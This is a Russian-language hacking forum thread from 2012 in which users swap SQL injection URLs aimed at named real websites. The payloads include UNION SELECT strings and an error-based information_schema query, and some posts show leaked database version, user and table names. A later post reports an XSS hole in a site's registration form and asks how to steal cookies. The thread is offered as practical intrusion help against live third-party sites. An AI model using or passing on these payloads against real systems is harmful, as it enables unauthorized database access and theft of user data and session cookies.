02.02.2012, 19:28
|
|
Познающий
Регистрация: 16.01.2011
Сообщений: 71
Провел на форуме:
23576
Репутация:
-1
|
|
http://www.studyguide.ru/reading.php?id=215'+UnIOn+SeLEcT+1+--+
можно ли обойти вот такую вот фигнюшку??
|
|
|
02.02.2012, 19:42
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094
Репутация:
672
|
|
Сообщение от pirat0
http://www.studyguide.ru/reading.php?id=215'+UnIOn+SeLEcT+1+--+
можно ли обойти вот такую вот фигнюшку??
проверяются вхождения в строке, врятли обойдешь
|
|
|
|
02.02.2012, 20:01
|
|
Постоянный
Регистрация: 17.09.2011
Сообщений: 390
Провел на форуме:
107835
Репутация:
23
|
|
Сообщение от pirat0
http://www.studyguide.ru/reading.php?id=215'+UnIOn+SeLEcT+1+--+
можно ли обойти вот такую вот фигнюшку??
Не слушай никого, все выводится
5.0.51a-24+lenny5:a28161_studyguid:a14801@localhost:debian-linux-gnu
|
|
|
|
02.02.2012, 20:11
|
|
Постоянный
Регистрация: 25.04.2011
Сообщений: 505
Провел на форуме:
195266
Репутация:
53
|
|
Сообщение от pirat0
http://www.studyguide.ru/reading.php?id=215'+UnIOn+SeLEcT+1+--+
можно ли обойти вот такую вот фигнюшку??
http://www.studyguide.ru/library.php
?search=2
&form[name]=-1'+union+select+1,2,version(),4,5,6,7,8,9,0,1,2,3, 4,5--+
&form[word]=
Сообщение от er9j6@
Не слушай никого, все выводится
5.0.51a-24+lenny5:a28161_studyguid:a14801@localhost:debian-linux-gnu
Интересно бы саму скуль увидеть или метод.
|
|
|
|
02.02.2012, 22:34
|
|
Познавший АНТИЧАТ
Регистрация: 12.07.2010
Сообщений: 1,546
Провел на форуме:
344922
Репутация:
75
|
|
Подскажите как можно дальше вывесли какие либо данные
Сообщение от None
http://www.indexcopernicus.com/info.php?id=6)+union+select+1,2,3,4--+
|
|
|
|
02.02.2012, 23:01
|
|
Постоянный
Регистрация: 01.12.2011
Сообщений: 560
Провел на форуме:
102354
Репутация:
267
|
|
Сообщение от qaz
Подскажите как можно дальше вывесли какие либо данные
Error-based:
Код:
http://www.indexcopernicus.com/info.php?id=6)+and(select+1+from(select+count(*),concat((select+concat(table_name,0x00)+from+information_schema.tables+limit+20,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)--+f
Result:
Код:
Duplicate entry 'users' for key 1
|
|
|
|
03.02.2012, 02:05
|
|
Постоянный
Регистрация: 02.02.2011
Сообщений: 727
Провел на форуме:
225312
Репутация:
-6
|
|
|
|
|
|
03.02.2012, 02:11
|
|
Участник форума
Регистрация: 01.12.2011
Сообщений: 120
Провел на форуме:
29020
Репутация:
55
|
|
tamper data
|
|
|
|
03.02.2012, 02:14
|
|
Постоянный
Регистрация: 02.02.2011
Сообщений: 727
Провел на форуме:
225312
Репутация:
-6
|
|
не не тампер не пропрёт а уже всё тенкс.
|
|
|
|
03.02.2012, 16:04
|
|
Познающий
Регистрация: 25.12.2011
Сообщений: 85
Провел на форуме:
28040
Репутация:
13
|
|
Здараствуйте, подскажите пожалуйста.. Нашел
http://vsetke.ru/registration/registration_form.jsp
xss При вставке в поля имя и пароль
">alert(/xss/)
Подскажи как можно вытащить куки ?
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
